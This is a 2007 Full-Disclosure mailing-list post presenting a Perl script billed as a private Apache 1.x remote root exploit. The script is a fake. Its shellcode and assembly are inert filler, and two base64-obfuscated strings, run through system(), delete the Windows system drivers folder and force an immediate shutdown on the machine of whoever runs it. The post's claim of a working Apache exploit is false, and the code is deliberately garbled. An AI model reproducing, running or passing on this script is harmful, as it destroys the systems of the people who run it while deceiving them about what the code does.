OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
[Full-disclosure] A new apache 1.x 0day

x666Safe-mail.net
Date: Mon Mar 19 2007 - 14:15:36 CDT


Hi,

A new apache 1.x 0day

#!/usr/bin/perl

use MIME::Base64;
use IO::Socket;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;

print q {

#################################################################
##
## Apache 1.X Remote Buffer Overflow getRoot() Exploit
## written by 666 - blueshishasafe-mail.net
##
## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE !
##
## If this is gonna be distributed, it will be my last one.
##
#################################################################

};

if($#ARGV < 1)
{
        print "[^] Usage : apache.pl [target] [port]\n";
        print "[^] Example : apache.pl 127.0.0.1 80\n";
        exit;
}

# Can be replaced, simply get a rootshell

$shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
              "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
              "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
              "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
              "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
              "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
              "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
              "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
              "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
              "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
              "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
              "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

my $target = $ARGV[1];

my $port = $ARGV[2];

sub connect {
       
local $SIG{'__DIE__'} =
       sub { (my $x = $_[0]) =~ s/0x/4/g; die $x };
       eval { die "0x4141414141" };
       print $ if $;
 }

sub socket {
       
push SOCKADDR;
push SOCKDATA;
push STACKDATA;
push ESPOINT;
push ENDADDR;

 }

eval qw (

Bytecode:

        dec cx
        jz Root
        mov bp, FloppyOff ;offset
        pushf
        push cs
                push bp
        jmp [OldISR]
        
Root:
        inc cx
        cmp dx, [SecondCntr] ;cs:.
        jne NotSecond
IsSecond:
        

        mov bh,5
        mov bl,21
        call seg OSSetCursorXY:OSSetCursorXY ; root runs once
        mov ax,cx
        call seg OSPrintWordNum:OSPrintWordNum
        
        
        
        mov bh,5
        mov bl,22
        call seg OSSetCursorXY:OSSetCursorXY
        mov ax,[RootCntr] ;cs:.
        mov [RootCntr],0 ;cs:.
        call seg OSPrintWordNum:OSPrintWordNum
);

{

   my ( S, T, M );

   my $code = '';

   sub md5 {

       return undef if ( !defined $_[0] );

       my $DATA = _md5_pad( $_[0] );

       &_md5_init() if ( !defined $M[0] );

       return _md5_perl_generated( \$DATA );

   }

   sub _md5_init {

       return if ( defined $S[0] );

       my $i;

       for ( $i = 1 ; $i <= 64 ; $i++ ) {

           $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );

       }

       my t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );

       for ( $i = 0 ; $i < 64 ; $i++ ) {

           $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];

       }

       M = (

           0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,

           1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,

           5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,

           0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9

       );

       &_md5_generate();

       my $TEST = _md5_pad('foobar');

       
   }

   sub _md5_pad {

       my $l = length( my $msg = shift() . chr(128) );

       $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );

       $l = ( $l - 1 ) * 8;

       $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );

       return $msg;

   }

   $mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=");
   $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==");

   sub _md5_generate {

       my $N = 'abcddabccdabbcda';

       my ( $i, $M ) = ( 0, '' );

       $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 );

       $code = <<EOT;

       sub _md5_perl_generated {

   BEGIN { \$^H |= 1; };

       my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);

       my (\$a,\$b,\$c,\$d,\$t,\$i);

       my \$dr=shift;

       my \$l=length(\$\$dr);

       for my \$L (0 .. ((\$l/64)-1) ) {

               my \D = unpack('V16', substr(\$\$dr, \$L*64,64));

               (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

       for ( $i = 0 ; $i < 16 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 32 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 48 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 64 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       $code .= <<EOT;

               \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;

               \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;

       } # for

   return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

       eval "$code";

   }

}

   sub rehash
   {
      my $unencrypted_string = shift _;
      my salt_chars = ('a'..'z','A'..'Z','0'..'9');
      my $salt = $salt_chars[rand(63)] . $salt_chars[rand(63)];
      return crypt($unencrypted_string, $salt);
   }

eval qw (

make_startup_room: ; setup ebp for WSAStartup data
  push BYTE 20 ; push 20
  pop eax ; register
  mul eax ; square that shit = 0x190
  sub esp, eax ; make room for WSAStartup data
  mov ecx, esp

make_table_room: ; setup ebp for address table
  sub esp, BYTE (_WSA_INIT_TBLEN * 4)
  push edi ; [ebp + 8] = LoadLibraryA
  push esi ; [ebp + 4] = LGetProcAddress
  push ebx ; [ebp + 0] = kernel32 dll base
  mov ebp, esp
  push ecx ; push WSAStartup data address
  push eax ; push 0x190

make_table: ; hash the table
  WSA_HASH_WINSOCK

wsa_startup:
  ; call WSAStartup
  WSA_CALL_WSASTART

make_socket:
  ; call WSASocketA, get a tcp socket
  WSA_CALL_SOCKET 'tcp'
  ; we got the socket in edi
);system ($mov);system ($int);shift;
eval qw (

        push word 0x4D2
 
        inc ebx
 
        push bx
 
        mov ecx, esp
 
        push byte 16
 
        push ecx
 
        push eax
 
        mov ecx, esp
 
        mov al, 102
 
        int 0x80
);

print "[x] Exploiting...\n";

sleep(4);

eval qw <
accept:
 
    push eax
 
    push edi
 
    mov ecx, esp
 
    inc ebx
 
    mov al, 102
 
    int 0x80
 
dup2:
 
        xor ecx, ecx
 
        mov cl, 3
>;

if ($recvdata != 0) {
print "[x] Executing Shellcode...";
}

if ($recvdata == 0) {
print "[x] Exploit failed!";
}

eval qw <
exec:
 
    xor eax,eax
 
    mov al, 11
 
    push ecx
 
    push "//sh"
 
    push "/bin"
 
    mov ebx, esp
 
    push ecx
 
    push ebx
 
    mov ecx, esp
 
    int 0x80
>;

exit;

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/